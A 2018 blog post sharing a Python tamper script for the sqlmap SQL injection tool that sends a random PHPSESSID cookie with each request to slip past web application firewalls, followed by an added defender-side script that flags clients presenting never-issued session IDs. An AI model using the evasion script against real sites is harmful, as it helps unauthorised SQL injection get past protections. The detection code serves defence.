Thursday, November 8, 2018

Random Session (Sqlmap Tamper)


SQLMAP is an automatic SQL injection and database takeover tool.
This tamper script can be used to bypass some web application firewalls by sending a random session cookie (PHPSESSID) with every request.

Download script


#!/usr/bin/env python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
author: 3H34N(nezami.me)
"""
import random
import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def randomsession():
    # Build a 32-character pseudo session ID from lowercase letters and digits
    length = 32
    chars = string.ascii_lowercase + string.digits
    session_id = ''.join(random.choice(chars) for _ in range(length))
    return "PHPSESSID=" + session_id


def tamper(payload, **kwargs):
    """
    Set a random 'PHPSESSID' cookie on every request to bypass
    WAF (usually application based) protection

    The payload itself is returned unchanged; only the request
    headers are modified. Note that this replaces any existing
    Cookie header, so other cookies on the request are dropped.
    """
    headers = kwargs.get("headers", {})
    headers["Cookie"] = randomsession()
    return payload
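A defender-side counterpart, added here and not part of the original post: every request sent through the tamper above carries a PHPSESSID the application never issued, so checking presented session IDs against the server's own session store, and counting how many never-issued IDs a single client presents, surfaces such traffic. The log format, IP addresses and session IDs below are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines: client IP, request line, Cookie header.
SAMPLE_LOG = """\
203.0.113.5 "GET /item.php?id=1 HTTP/1.1" "PHPSESSID=k2m9vq3p0a8r7b5e1c4d6f9g2h3j"
198.51.100.9 "GET /item.php?id=1 HTTP/1.1" "PHPSESSID=z8y7x6w5v4u3t2s1r0q9p8o7n6m5l4k3"
198.51.100.9 "GET /item.php?id=2 HTTP/1.1" "PHPSESSID=a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6"
198.51.100.9 "GET /item.php?id=3 HTTP/1.1" "PHPSESSID=q9w8e7r6t5y4u3i2o1p0a9s8d7f6g5h4"
203.0.113.5 "GET /cart.php HTTP/1.1" "PHPSESSID=k2m9vq3p0a8r7b5e1c4d6f9g2h3j"
"""

# Constructed: session IDs the application actually issued (e.g. read from its session store).
ISSUED_SESSIONS = {"k2m9vq3p0a8r7b5e1c4d6f9g2h3j"}

LINE_RE = re.compile(r'^(?P<ip>\S+) "(?P<req>[^"]*)" "(?P<cookie>[^"]*)"$')
SESSID_RE = re.compile(r'PHPSESSID=([A-Za-z0-9,-]+)')


def parse(log_text):
    """Yield (ip, request, session_id_or_None) for each well-formed log line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        s = SESSID_RE.search(m["cookie"])
        yield m["ip"], m["req"], (s.group(1) if s else None)


def unissued_session_ids(log_text, issued):
    """Map each client IP to the set of PHPSESSID values it presented that the server never issued."""
    suspect = defaultdict(set)
    for ip, _req, sid in parse(log_text):
        if sid is not None and sid not in issued:
            suspect[ip].add(sid)
    return dict(suspect)


def flag_sources(log_text, issued, threshold=3):
    """Return client IPs that presented at least `threshold` distinct never-issued session IDs."""
    by_ip = unissued_session_ids(log_text, issued)
    return sorted(ip for ip, sids in by_ip.items() if len(sids) >= threshold)
```

A legitimate client reuses the one ID the server gave it, so it never accumulates unissued IDs; a client that rotates a fresh random cookie per request crosses the threshold within a few requests.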
